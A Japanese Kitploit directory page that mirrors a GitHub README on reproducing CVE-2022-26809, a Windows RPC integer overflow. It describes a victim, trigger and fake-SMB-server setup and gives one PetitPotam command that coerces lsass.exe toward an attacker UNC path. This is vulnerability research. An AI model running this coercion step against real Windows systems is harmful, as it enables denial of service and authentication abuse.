Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/michealadams30/cve-2022-26809
脆弱性分析エクスプロイトペネトレーションテストペイロード開発バイナリエクスプロイト
GitHubmichealadams30/cve-2022-26809

Cve-2022-26809

CVE-2022-26809 用の概念実証エクスプロイト、Windows RPC ランタイム整数オーバーフロー脆弱性。lsass.exe に対する PetitPotam スタイルの UNC パス強制を使用したトリガースクリプトと、エクスプロイトテスト用の fake SMB サーバを含む。

リポジトリを見る
113年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Cve-2022-26809

CVE-2022-26809

このリポジトリは単にCVEの調査を行うものです。詳細な分析については、こちらを参照してください。
更新:05/19 2022
この分析はまだ完了していません……

更新:05/22 2022
HuanGMzの投稿 と corelightのブログ が実際の脆弱性箇所を示しています:

OSF_CASSOCIATION::ProcessBindAckOrNak

この脆弱性は CVE-2021-43893 と同様にトリガーされます。ESFRPCリクエストを UNCパス と共に lsass.exe に送信すると、被害者はターゲットに クライアントとして アクセスしようとします。そのため、クライアントAPI で整数オーバーフローが発生します。

この脆弱性をトリガーするためのより良い解決策があれば、遠慮なく issue や PR を提出してください :)

PoC-CVE-2022-26809

こちらを参照

脆弱性は CVE-2021-43893 と同様にトリガーされるため、PetitPotam のコードをクローンするだけです。

以下のように環境を準備します:

  • トリガー: PetitPotam を使用
  • 被害者: 脆弱な rpcrt4.dll を使用
  • 攻撃者: attacker-server を使用
  1. fake_smb_server.py を attacker-server 上で実行します。事前に rpcrt.py をオリジナルのものに置き換えてください(Windowsでは445ポートはSystemによって占有されているため、Linux上にサービスをデプロイすることを推奨します)
  2. 以下のコマンドで被害者に attacker serve にアクセスさせる:
root@kitploit:~
python petitpotam.py -pipe lsarpc -method DecryptFileSrv -debug "user:[email protected]" "\\attacker.path\realfile
  1. 通常はBSODを引き起こしません。lsass.exe にページヒープを有効にします(ただし、BSoDのトリガーには成功していませんが、windbgによると整数オーバーフローはトリガーされています)

旧説明
これは Windows RPC 脆弱性 CVE-2022-26809 の再現コードです。また、https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/netds/rpc/hello を参照しています。

PoC-OSF_SCALL::GetCoalescedBuffer

私のPythonバージョンは3.6.7です
GetCoalescedBufferが実際のCVE-2022-26809に関係するかは不明ですが、念のため残しておきます
poc.py は脆弱性関数 OSF_SCALL::GetCoalescedBuffer をトリガーしようと試みます。dword整数オーバーフローは再現が非常に難しいため、クラッシュは発生しません。また、rpcrt.py はPythonパッケージ impacket.dcerpc.v5.rpcrt です。これをオリジナルのものと置き換えて脆弱性をトリガーします(オリジナルはバックアップを忘れずに :) 。rpcrt.py には多くのバグがあると思います)。

うまくいかない場合は、wireshark がバグの特定に役立つかもしれません。

PipeDemo

必要に応じて、nmake を使用してリビルドしてください。

ツールをダウンロード